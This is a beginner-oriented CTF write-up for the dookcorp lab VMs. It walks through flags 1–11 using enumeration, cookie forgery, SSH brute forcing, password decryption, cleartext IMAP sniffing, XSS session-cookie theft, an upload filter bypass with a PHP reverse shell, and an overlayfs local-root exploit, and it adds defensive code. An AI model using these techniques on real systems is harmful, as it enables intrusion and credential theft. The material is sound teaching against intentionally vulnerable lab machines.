dookcorp!… BNE0x09 CTF
Recently I was privileged to be a tester for a new CTF created by @dookwit for the SecTalks Brisbane meetups. This write-up will be a little long-winded for seasoned CTF folk; my goal is to write it for a beginner audience in order to share entry-level enumeration techniques and general tool usage.
Description:
Hi fellow SecTalkers! Welcome to my first SecTalks CTF... dookcorp!
This is a Boot2Root (kinda) which also has a Jeopardy style (so lots of flags to submit to a scoreboard).
CTF Level (Beginner-Medium)
===========================
Always hard to gauge... I think some people will smash through it fairly quickly.
But the idea is to learn something, so hopefully some people will learn some new tricks.
VM Setup
========
There are 2 OVAs (Server and Desktop)
They were both built in VirtualBox (so no clue if it'll work nicely on VMware)
They both have static IP addresses in the 192.168.56.0/24 range (VirtualBox default Host only network)
Import 'em... make sure the networks are sorted, turn 'em on, and confirm you can see/find their IP addresses
Start hacking!
Note - Err... there appears to be a slight delay in the web server starting up. Give it up to 5 mins just in case... oops... spoiler... there's a web server ;)
Flags
=====
All flags are random MD5 hashes and are in the format "flag{abcdef1234567890}".
There are a total of 15 flags to find.
Let's get started! First up, find the IP addresses of our guest VMs, 'Server' and 'Desktop'. Both sit on the VirtualBox host-only network, so an ARP sweep of 192.168.56.0/24 is the quickest way to find them:
```
Currently scanning: Finished!   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.50   08:00:27:04:e1:c4      1      60  Cadmus Computer Systems
 192.168.56.60   08:00:27:35:94:b9      1      60  Cadmus Computer Systems
```
… and take a look at what services are listening.
```
root@omerta:~/offsec/ctf/dookcorp# nmap -n -Pn -A -p- 192.168.56.50

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-03 14:21 AEST
Nmap scan report for 192.168.56.50
Host is up (0.00042s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 51:2a:d0:d2:dc:af:52:a4:30:dd:ea:ee:20:ac:a2:7a (DSA)
|   2048 1c:02:a4:dc:58:14:78:c8:f6:3b:f2:41:30:80:3c:e9 (RSA)
|_  256 ba:33:fd:1c:08:24:81:fb:d3:45:cf:0d:01:86:e6:a8 (ECDSA)
25/tcp  open  smtp    Postfix smtpd
|_smtp-commands: mailserver.dookcorp.awesome, PIPELINING, SIZE 10240000, VRFY, ETRN, AUTH PLAIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp  open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-server-header: Apache/2.4.10 (Ubuntu)
|_http-title: Welcome to dookCORP
143/tcp open  imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: ID more Pre-login LITERAL+ IDLE have post-login ENABLE AUTH=PLAINA0001 LOGIN-REFERRALS listed capabilities IMAP4rev1 SASL-IR OK
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:04:E1:C4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: Host: mailserver.dookcorp.awesome; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.56.50

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds
```
The Postfix banner gives the hostname 'mailserver.dookcorp.awesome', so I think it's safe to assume that 192.168.56.50 is our Server. Note for later that IMAP on 143 advertises AUTH=PLAIN with no STARTTLS in its capability list.
```
root@omerta:~/offsec/ctf/dookcorp# nmap -n -Pn -A -p- 192.168.56.60

Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-03 14:22 AEST
Nmap scan report for 192.168.56.60
Host is up (0.00035s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.9p1 Ubuntu 2ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 f2:a1:d9:8d:98:7c:b1:13:7e:f6:84:ee:f5:df:e3:6f (DSA)
|   2048 44:20:8d:c7:e4:be:b7:70:87:9f:a4:1c:14:65:07:35 (RSA)
|_  256 fc:3f:4d:0a:91:0e:8a:14:a4:5d:9e:14:f8:68:55:16 (ECDSA)
MAC Address: 08:00:27:35:94:B9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.56.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
```
Personally I always like to start with the low hanging fruit, which, in this case, is port 80. Let’s take a look.
Flag 1
Nothing too obvious there.. so let’s take a look at the source code.
```
root@omerta:~/offsec/ctf/dookcorp# curl -s 192.168.56.50
<html>
<head>
<title>
Welcome to dookCORP
</title>
</head>
<body>
<center>
<img src="dookcorp.jpg">
</body>
</html>
<!--Flag1 = flag{MD5_REDACTED} -->
```
Voila.. Flag1 straight up and that gets us points on the board!
Flag 2
Still working with our low-hanging fruit, the web service, let's enumerate any other directories or files that may exist by brute-forcing paths from a wordlist. Personal tool of choice: OJ's Gobuster.
```
root@omerta:~/offsec/ctf/dookcorp# gobuster-git -w /usr/share/wordlists/seclists/Discovery/Web_Content/big.txt -u 192.168.56.50/

=====================================================
Gobuster v1.0 (DIR support by OJ Reeves @TheColonial) (DNS support by Peleus @0x42424242)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.56.50/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/seclists/Discovery/Web_Content/big.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/company (Status: 301)
/robots.txt (Status: 200)
=====================================================
```
Great! A directory and a file to look at. Let’s take a look at the robots.txt file to discover any other files or directories which may exist.
```
root@omerta:~/offsec/ctf/dookcorp# curl -s 192.168.56.50/robots.txt
Flag2 = flag{MD5_REDACTED}
```
Sweet! Flag2 found.
Flag 3
What does the /company directory give us?
```
root@omerta:~/offsec/ctf/dookcorp# curl -sL 192.168.56.50/company
<html>
<head>
<title>
Welcome to the dookCORP Company Portal
</title>
</head>
<body>
This is the dookCORP Company Portal
<p>
Flag3 = flag{MD5_REDACTED}
<p>
<a href="/zAzCzCzEzSzSz/accesscode.php">Flag4</a>
<p>
Click <a href="messageboard/">here</a> to goto the dookCORP messageboard for company notices. You'll need to login, it's probably best if you save your login details in Firefox for easy access from the Desktop machine. - dook.
</body>
</html>
```
Nice.. another flag! We’re on a good roll!
Flag 4
We don’t need to be told twice regarding where to look for Flag4! Let’s take a look!
```
root@omerta:~/offsec/ctf/dookcorp# curl -isL 192.168.56.50//zAzCzCzEzSzSz/accesscode.php
HTTP/1.1 200 OK
Date: Tue, 03 May 2016 04:42:15 GMT
Server: Apache/2.4.10 (Ubuntu)
Set-Cookie: accesscode=cfcd208495d565ef66e7dff9f98764da
Content-Length: 46
Content-Type: text/html; charset=UTF-8

Incorrect AccessCode!<br>You need to be 1337!
```
There are a couple of interesting things to look at here. Firstly, the server sets a cookie called "accesscode"; secondly, there's a hint that our access code was incorrect and that we need to be 1337. The "accesscode" value is 32 hex characters, which looks like MD5 to me (it is in fact the MD5 of the string "0", i.e. a default of "no code"). Let's create an MD5 hash of the string 1337 and see how the application responds.
```
root@omerta:~/offsec/ctf/dookcorp# echo -n '1337' | md5sum
e48e13207341b6bffb7fb1622282247b  -
```
As you may have noticed by now, I’m a big fan of using the CLI when I can.
```
root@omerta:~/offsec/ctf/dookcorp# curl -isL -b "accesscode=e48e13207341b6bffb7fb1622282247b" 192.168.56.50//zAzCzCzEzSzSz/accesscode.php
HTTP/1.1 200 OK
Date: Tue, 03 May 2016 04:49:20 GMT
Server: Apache/2.4.10 (Ubuntu)
Content-Length: 47
Content-Type: text/html; charset=UTF-8

Flag4 = flag{MD5_REDACTED}
```
BAM! Another flag. If you're not a fan of using the CLI, you could use tools such as Burp Suite, TamperData, or the developer tools of your browser to get the same result. Each to their own. The underlying weakness is that the server trusts a value it handed to the client: the cookie is an unkeyed MD5 of the access code, so anyone who can guess the code can mint a valid cookie without ever going near a login form.
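To make that weakness concrete, here is an added Python example (my own, not code from the CTF or this page): `crack_cookie` shows that the default cookie is simply MD5 of the string "0", `forge_cookie` mints the value for 1337 exactly as the curl call above did, and the HMAC-signed variant shows what the server should have issued instead. `vulnerable_check` is my assumption of what accesscode.php does (its source is not on the page), and `SERVER_KEY` is a made-up key generated at import time.

```python
import hashlib
import hmac
import secrets
from typing import Iterable, Optional

# Values observed in the curl transcripts above.
DEFAULT_COOKIE = "cfcd208495d565ef66e7dff9f98764da"  # the cookie the server hands out
WANTED_CODE = "1337"                                  # the code the hint points at


def forge_cookie(code: str) -> str:
    """Mint the cookie value the server expects for a given access code.

    The cookie is a bare MD5 of the code with no server secret mixed in,
    so any client can compute it for any code it likes.
    """
    return hashlib.md5(code.encode()).hexdigest()


def crack_cookie(observed: str, candidates: Iterable[str]) -> Optional[str]:
    """Find which candidate code an observed cookie was made from.

    Used here to show that the default cookie is just MD5("0"): an unkeyed
    hash of a low-entropy value is no more secret than the value itself.
    """
    for cand in candidates:
        if hmac.compare_digest(forge_cookie(cand).encode(), observed.encode()):
            return cand
    return None


def vulnerable_check(cookie: str) -> bool:
    """The comparison accesscode.php appears to make (assumed, not its real source)."""
    return hmac.compare_digest(cookie.encode(), forge_cookie(WANTED_CODE).encode())


# Hardened variant: the server signs what it issues. SERVER_KEY stands in
# for a key that never leaves the server; it is generated here only so the
# example is self-contained.
SERVER_KEY = secrets.token_bytes(32)


def issue_signed_cookie(code: str, key: bytes = SERVER_KEY) -> str:
    """Return 'code.sig' with sig = HMAC-SHA256(key, code)."""
    sig = hmac.new(key, code.encode(), hashlib.sha256).hexdigest()
    return f"{code}.{sig}"


def verify_signed_cookie(cookie: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Return the code carried by the cookie if its signature is genuine, else None."""
    code, sep, sig = cookie.rpartition(".")
    if not sep or not code:
        return None
    expected = hmac.new(key, code.encode(), hashlib.sha256).hexdigest()
    return code if hmac.compare_digest(expected.encode(), sig.encode()) else None


if __name__ == "__main__":
    print("default cookie is MD5 of:", crack_cookie(DEFAULT_COOKIE, (str(n) for n in range(10))))
    forged = forge_cookie(WANTED_CODE)
    print("forged cookie for 1337:", forged)
    print("vulnerable check accepts it:", vulnerable_check(forged))
    print("signed cookie minted without the key:", verify_signed_cookie(WANTED_CODE + "." + "0" * 64))
```

Signing the cookie stops a client from minting one, but the wider lesson is that anything the client can recompute is not a credential: keep the access decision server side (a session record keyed by a random ID) and rate-limit whatever endpoint actually takes the code.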
Flag 5
The hint for Flag 5 is as follows:
Brute force frank on the Desktop (This is the only brute force challenge)
Once you have the password you CAN log on to the Desktop computer through the GUI
Fair enough.. let's brute force our way onto the Desktop as 'frank'. Looking back at our scan of the Desktop (192.168.56.60), the only service listening is SSH on port 22, so that's where the brute force goes.
```
root@omerta:~/offsec/ctf/dookcorp# hydra -l frank -P /usr/share/wordlists/rockyou.txt 192.168.56.60 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-03 14:58:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.56.60   login: frank   password: 1234567
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-05-03 14:58:20
```
Too easy: '1234567' sits near the top of rockyou.txt, which is why the run finished in four seconds. (Against a real SSH daemon, heed hydra's warning and drop to -t 4, or MaxStartups will start dropping your connections.) Let's log in via SSH!
```
root@omerta:~/offsec/ctf/dookcorp# ssh frank@192.168.56.60
The authenticity of host '192.168.56.60 (192.168.56.60)' can't be established.
ECDSA key fingerprint is SHA256:YBCgV52FvoBmZW8jLEztjdmH19tqdhj40wLHwXwqUcE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.60' (ECDSA) to the list of known hosts.
frank@192.168.56.60's password:
Welcome to Ubuntu 15.10 (GNU/Linux 4.2.0-16-generic i686)

 * Documentation:  https://help.ubuntu.com/

Last login: Wed Apr 20 19:54:26 2016 from 192.168.56.1
frank@dookcorp-desktop:~$ pwd;ls -al /home/frank
total 696
drwxr-xr-x 17 frank frank   4096 Apr 20 19:56 .
drwxr-xr-x  4 root  root    4096 Apr 10 16:03 ..
-rw-------  1 frank frank      0 Apr 20 20:27 .bash_history
-rw-r--r--  1 frank frank    220 Apr 10 16:03 .bash_logout
-rw-r--r--  1 frank frank   3771 Apr 10 16:03 .bashrc
drwx------ 14 frank frank   4096 Apr 19 17:48 .cache
drwx------ 17 frank frank   4096 Apr 19 17:18 .config
drwxr-xr-x  2 frank frank   4096 Apr 20 19:56 Desktop
-rw-r--r--  1 frank frank     25 Apr 10 16:04 .dmrc
drwxr-xr-x  2 frank frank   4096 Apr 10 16:04 Documents
drwxr-xr-x  2 frank frank   4096 Apr 10 16:04 Downloads
-rw-r--r--  1 frank frank   8980 Apr 10 16:03 examples.desktop
-rw-rw-r--  1 frank frank     47 Apr 20 19:55 Flag5.txt
drwx------  3 frank frank   4096 Apr 20 19:53 .gconf
-rw-------  1 frank frank   3230 Apr 20 19:53 .ICEauthority
drwx------  3 frank frank   4096 Apr 10 16:04 .local
drwxr-xr-x  2 frank frank   4096 Apr 10 16:04 Music
-rw-rw-r--  1 frank frank 593562 Apr 10 16:08 MyFireFoxProfileBackup.zip
drwxrwxr-x  2 frank frank   4096 Apr 20 19:54 .nano
drwxr-xr-x  2 frank frank   4096 Apr 10 16:04 Pictures
-rw-r--r--  1 frank frank    675 Apr 10 16:03 .profile
drwxr-xr-x  2 frank frank   4096 Apr 10 16:04 Public
drwxr-xr-x  2 frank frank   4096 Apr 10 16:04 Templates
drwx------  4 frank frank   4096 Apr 18 20:49 .thunderbird
drwxr-xr-x  2 frank frank   4096 Apr 10 16:04 Videos
drwxr-xr-x  2 frank frank   4096 Apr 18 21:22 .wireshark
-rw-------  1 frank frank     61 Apr 20 19:53 .Xauthority
-rw-------  1 frank frank   2645 Apr 20 20:27 .xsession-errors
-rw-------  1 frank frank   2168 Apr 20 17:49 .xsession-errors.old
frank@dookcorp-desktop:~$
```
Reading Flag5.txt gives us the flag.
```
frank@dookcorp-desktop:~$ cat Flag5.txt
Flag5 = flag{MD5_REDACTED}
```
Flag 6
Our hint for Flag 6 is “MessageBoard”. In Flag3 we had a mention of a messageboard:
```
Click <a href="messageboard/">here</a> to goto the dookCORP messageboard for company notices. You'll need to login, it's probably best if you save your login details in Firefox for easy access from the Desktop machine. - dook.
```
Let’s take a look at the messageboard, this time in a browser just to mix it up a little bit.
The first thing I always try is a username of 'admin' with a password of 'admin', followed by some simple XSS and SQLi probes; none of them worked on a quick check.
Did you see the MyFireFoxProfileBackup.zip file in frank’s home directory? Did you see the hint from Flag3 saying “it’s probably best if you save your login details in Firefox”? Let’s grab that and take a look to see if he’s saved passwords.
```
root@omerta:~/offsec/ctf/dookcorp# scp frank@192.168.56.60:~/MyFireFoxProfileBackup.zip .
frank@192.168.56.60's password:
MyFireFoxProfileBackup.zip                    100%  580KB 579.7KB/s   00:00
root@omerta:~/offsec/ctf/dookcorp# unzip MyFireFoxProfileBackup.zip
Archive:  MyFireFoxProfileBackup.zip
   creating: .mozilla/
   creating: .mozilla/firefox/
<redacted>
  inflating: .mozilla/firefox/profiles.ini
<redacted>
```
Looks promising! Let’s search for credentials with Unode’s Firefox Decrypt tool.
```
root@omerta:~/offsec/ctf/dookcorp# firefox_decrypt-git .mozilla/firefox/

Master Password for profile .mozilla/firefox/10r85o44.default:
2016-05-03 15:28:08,790 - WARNING - Attempting decryption with no Master Password

Website:   http://192.168.56.50
Username: 'frank'
Password: '5QdSa0iGmKjqWVcQUBpX'
```
Voila! Let’s test the creds on the messageboard.
Flag 6 complete!
Flag 7
The hint for Flag7 is “Secure Messageboard”, and the message board from Flag6 hints that the URL has been emailed to us.
Messageboard:
"OK guys, some news. As this portal isn't that secure, we've created a new secret one. You don't need to login but the url is private so I've emailed it to you, hope you haven't deleted it!
If you have come see me and I'll find the email from my Sent Items (I check my email pretty regularly).
On an unrelated note, so you can do your job better I've given you access to some tools on the Desktop machine.
The tools are: ls, mkdir, WireShark and spider solitaire."
Let's log on to the Desktop and check frank's email. Starting Thunderbird shows that frank doesn't have email set up. The message above tells us that dook checks his email regularly, and we have Wireshark on the Desktop, so let's see whether any of that traffic passes where we can see it.
After a short while we see dook checking his mail. Remember that the IMAP service on the Server advertised AUTH=PLAIN and no STARTTLS, so the login crosses the wire in the clear. Let's follow the TCP stream and grab the credentials.
BAM! We configure Thunderbird with dook's credentials.
In the inbox we see an email from frank to dook, with the subject of “URL”.
Looking in the Sent items we can see the email from dook to frank with the SecureMessageBoard URL.
Let’s browse to this location.
Flag7 is ours!
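What "Follow TCP Stream" recovers, as an added Python example that is not part of the original write-up: with the capabilities the server advertised (AUTH=PLAIN, SASL-IR, no STARTTLS) an IMAP login is either a `LOGIN user password` line or a base64 `AUTHENTICATE PLAIN` blob, and both are readable as they pass. The parser below handles both forms, including the SASL initial response sent inline or on the following line. The sample streams and the password in them are constructed for the example; dook's real credentials are not shown here.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed client-to-server IMAP traffic, standing in for what Wireshark's
# "Follow TCP Stream" shows. The password is made up.
SAMPLE_LOGIN_STREAM = (
    "a001 CAPABILITY\r\n"
    'a002 LOGIN "dook" "NotTheRealPassword1"\r\n'
    "a003 SELECT INBOX\r\n"
)

# The same login via SASL PLAIN, the mechanism the server advertised. The
# client sends base64("\0user\0password"), either inline (SASL-IR) or on
# the line after the server's "+" continuation.
SAMPLE_PLAIN_STREAM = (
    "a001 AUTHENTICATE PLAIN\r\n"
    + base64.b64encode(b"\0dook\0NotTheRealPassword1").decode() + "\r\n"
)

# tag LOGIN user password, with or without double quotes around each argument
LOGIN_RE = re.compile(r'^\S+\s+LOGIN\s+("?)([^"\s]+)\1\s+("?)([^"\s]+)\3\s*$', re.I)
# tag AUTHENTICATE PLAIN [initial-response]
AUTH_PLAIN_RE = re.compile(r"^\S+\s+AUTHENTICATE\s+PLAIN(?:\s+(\S+))?\s*$", re.I)


def decode_sasl_plain(blob: str) -> Optional[Dict[str, str]]:
    """Decode a SASL PLAIN response: base64 of authzid \\0 authcid \\0 password."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:            # binascii.Error is a ValueError
        return None
    parts = raw.split(b"\0")
    if len(parts) != 3:
        return None
    user, password = (p.decode("utf-8", "replace") for p in parts[1:])
    return {"method": "PLAIN", "user": user, "password": password}


def extract_imap_credentials(stream: str) -> List[Dict[str, str]]:
    """Pull every cleartext IMAP credential out of the client side of a stream."""
    found: List[Dict[str, str]] = []
    lines = stream.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        m = LOGIN_RE.match(line)
        if m:
            found.append({"method": "LOGIN", "user": m.group(2), "password": m.group(4)})
        else:
            m = AUTH_PLAIN_RE.match(line)
            if m:
                blob = m.group(1)
                if blob is None and i + 1 < len(lines):   # response on the next line
                    i += 1
                    blob = lines[i].strip()
                creds = decode_sasl_plain(blob) if blob else None
                if creds:
                    found.append(creds)
        i += 1
    return found


if __name__ == "__main__":
    for sample in (SAMPLE_LOGIN_STREAM, SAMPLE_PLAIN_STREAM):
        print(extract_imap_credentials(sample))
```

The fix on the Dovecot side is to offer the service over TLS (STARTTLS or IMAPS) and keep `disable_plaintext_auth = yes`, which refuses LOGIN and PLAIN on unencrypted connections; the AUTH PLAIN that Postfix offered on port 25 deserves the same treatment.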
Flag 8
First things first.. do we have an XSS?
Our test script is accepted, and we are redirected to the Secure Messageboard with our successful XSS test executed.
One of the messages gives us the hint that dook logs in constantly to check the Secure Messageboard:
Name: dook
Message: Oh... and don't be a dick! I monitor this page constantly.
Let’s create a service which will capture dook’s session cookie. If all works out well, we should be able to replay the cookie and presumably log on as an admin.
```
root@omerta:~/offsec/ctf/dookcorp# cat index.php
<?php
$cookie = isset($_GET["cookiemonster"])?$_GET['cookiemonster']:"";
?>
```
Now.. let's create some type of listener. You could use Apache for this and just check your access logs, or you could use a simple Python module, which is my preference. Note that SimpleHTTPServer only serves files and never executes PHP, so index.php above is just a target path: the cookie lands in the listener's access log, which is all we need.
```
root@omerta:~/offsec/ctf/dookcorp# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
```
And our XSS..
The message is accepted, and once the page reloads we can see our PHPSESSID being passed to our listener. All we need to do now is wait for dook to log on to check the messageboard, and we should be able to get his PHPSESSID cookie session for a replay attack.
```
root@omerta:~/offsec/ctf/dookcorp# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.56.1 - - [03/May/2016 19:47:19] "GET /index.php?cookiemonster=PHPSESSID=41r0f1urqrss7c5e9qiq0ddeh2 HTTP/1.1" 200 -
192.168.56.50 - - [03/May/2016 19:48:03] "GET /index.php?cookiemonster=PHPSESSID=d4e68177f8ba58c9724c946b0e6cbdb6 HTTP/1.1" 200 -
```
Two hits: the first, from 192.168.56.1, is our own browser loading the page; the second comes from 192.168.56.50, so the simulated dook browses from the Server itself. Let's revisit the page with dook's PHP session ID.
```
root@omerta:~/offsec/ctf/dookcorp# curl -isL -b "PHPSESSID=d4e68177f8ba58c9724c946b0e6cbdb6" http://192.168.56.50/company/messageboard/11dc27ec2cadacdedda504f7dfd3fbb1/admin.php
HTTP/1.1 200 OK
Date: Tue, 03 May 2016 10:01:26 GMT
Server: Apache/2.4.10 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 194
Content-Type: text/html; charset=UTF-8

Welcome Admin!<br>Flag8 = flag{MD5_REDACTED}<br>File Upload is at http://192.168.56.50/company/messageboard/11dc27ec2cadacdedda504f7dfd3fbb1/b304b3f496c443d7565f8fda2018b12d
```
Voila. Flag8 solved.
Flag 9
As per the hint in Flag8, the next step is file upload. Let’s try the obvious first by attempting to upload a PHP reverse shell.
It looks like our upload was accepted, but the PHP extension was recognised as potentially malicious: looking in the /uploads directory we can see our shell has been stored without its extension, so Apache will never execute it.
So what happens if we simply add another .php extension to our original shell, and upload that?
Success! Our shell uploads correctly. Let’s setup a listener…
```
root@omerta-vm:~# nc -nvlp 443
listening on [any] 443 ...
```
… and execute our shell.
```
root@omerta-vm:~# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.50] 43319
Linux dookcorp-server 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux
 21:00:45 up  1:17,  0 users,  load average: 0.00, 0.04, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
$
```
We navigate to the upload application's directory on disk and grab our flag.
```
$ cd /var/www/html/company/messageboard/11dc27ec2cadacdedda504f7dfd3fbb1/b304b3f496c443d7565f8fda2018b12d
$ ls -al
total 24
drwxr-xr-x 3 www-data www-data 4096 Apr 27 18:46 .
drwxr-xr-x 3 www-data www-data 4096 Apr 20 20:14 ..
-rw-r--r-- 1 www-data www-data   47 Apr 20 20:14 Flag9.txt
-rw-r--r-- 1 www-data www-data  248 Apr 10 15:07 index.html
-rw-r--r-- 1 www-data www-data  954 Apr 27 18:46 upload.php
drwxr-xr-x 2 www-data www-data 4096 May  3 20:58 uploads
$ cat Flag9.txt
cat Flag9.txt
Flag9 = flag{MD5_REDACTED}
```
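Why the double extension worked, as an added Python example (my reconstruction, not the source of upload.php, which is not on the page): `naive_filter` models a sanitiser that strips one trailing PHP extension, so shell.php.php is stored as shell.php and still reaches mod_php, and `hardened_filter` is the allow-list-and-rename approach I would put in its place. The blocked and allowed extension sets are my choices for the example.

```python
import os
import secrets
from typing import Optional

# Extension sets are my choices for the example, not the CTF's.
BLOCKED = {"php", "phtml", "php3", "php4", "php5", "phar"}
ALLOWED = {"png", "jpg", "jpeg", "gif", "txt"}


def naive_filter(filename: str) -> str:
    """Model of the uploader's sanitiser: strip one trailing PHP extension.

    'shell.php' becomes 'shell', but 'shell.php.php' becomes 'shell.php',
    which is exactly what we saw in the uploads directory.
    """
    base, ext = os.path.splitext(filename)
    if ext.lstrip(".").lower() in BLOCKED:
        return base
    return filename


def apache_runs_as_php(stored_name: str) -> bool:
    """Would a FilesMatch-style handler keyed on the final extension hand this to PHP?"""
    _base, ext = os.path.splitext(stored_name)
    return ext.lstrip(".").lower() in BLOCKED


def hardened_filter(filename: str) -> Optional[str]:
    """Allow-list the extension, reject PHP anywhere in the name, and rename.

    Returns the name to store, or None when the upload must be rejected.
    The caller still has to keep the directory outside the web root or with
    the PHP engine disabled for it.
    """
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return None                      # no extension, or a dotfile
    if any(p in BLOCKED for p in parts[1:]):
        return None                      # shell.php.jpg, shell.phtml, ...
    ext = parts[-1]
    if ext not in ALLOWED:
        return None
    return f"{secrets.token_hex(16)}.{ext}"  # uploader no longer controls the stored name


if __name__ == "__main__":
    for upload in ("shell.php", "shell.php.php", "shell.php.jpg", "photo.JPG", "../../etc/passwd"):
        stored = naive_filter(upload)
        print(f"{upload:18} naive -> {stored:14} php? {apache_runs_as_php(stored)!s:5} "
              f"hardened -> {hardened_filter(upload)}")
```

Renaming removes any control the uploader has over the stored name, and rejecting a PHP extension anywhere in the name also guards against AddHandler-style configurations that treat shell.php.jpg as PHP. Serving the uploads directory with the PHP engine switched off (`php_admin_flag engine off` in that directory's configuration) is the belt-and-braces layer that makes the filter's mistakes harmless.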
Flag 10
It’s time for some privilege escalation. Let’s take a look at what distro we’re working with.
```
$ uname -a ; cat /etc/issue
Linux dookcorp-server 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux
Ubuntu 15.04 \n \l
```
Ubuntu 15.04. Let’s check if there is anything obvious listed on exploit-db.
```
root@omerta:~/offsec/ctf/dookcorp# searchsploit 15.04
------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                      |  Path
                                                                                    | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------ ----------------------------------
Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability                 | ./php/webapps/3843.txt
WordPress FeedWordPress Plugin 2015.0426 - SQL Injection                            | ./php/webapps/37067.txt
Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)                    | ./linux/local/37292.c
Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File)              | ./linux/local/37293.txt
------------------------------------------------------------------------------------ ----------------------------------
```
overlayfs Local Root exploit... that sounds promising to me. EDB-ID 37292 is the overlayfs bug CVE-2015-1328, and the 3.19.0-15 kernel from uname dates from April 2015, before Ubuntu shipped the fix, so it's worth a try. Time to download the exploit, compile it, and attempt to run it.
```
$ wget 192.168.56.103/exploit.c
--2016-05-03 21:19:38--  http://192.168.56.103/exploit.c
Connecting to 192.168.56.103:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4966 (4.8K) [text/plain]
Saving to: 'exploit.c'

exploit.c           100%[=====================>]   4.85K  --.-KB/s   in 0s

2016-05-03 21:19:38 (724 MB/s) - 'exploit.c' saved [4966/4966]

$ gcc exploit.c -o exploit
$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id;whoami;hostname
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root
dookcorp-server
#
```
BAM! Exploit success and we are now root!
Let’s look for some flags.
```
# find / -name Flag*
/root/Flag11.txt
/var/www/html/company/messageboard/11dc27ec2cadacdedda504f7dfd3fbb1/b304b3f496c443d7565f8fda2018b12d/Flag9.txt
/var/lib/mysql/Flag10
#
```
Nice.. a couple of flags there. Let’s take a look at Flag10 first.
```
# cd /var/lib/mysql/Flag10
cd /var/lib/mysql/Flag10
# ls
db.opt  flag10.frm  flag10.ibd
# strings flag10.ibd
infimum
supremum/
Flag10 = flag{MD5_REDACTED}
#
```
Thank you very much.. Flag10 captured.
Flag 11
Thanks to the enumeration in Flag10, Flag11 is pretty straight forward.
```
# cat /root/Flag11.txt
Flag11 = flag{MD5_REDACTED}
```
Flag 12
The hint for Flag 12 is ‘dook has been working on an “alternate” web server on the Desktop’. Let’s jump back to the Desktop machine and see what services are in a listening state.
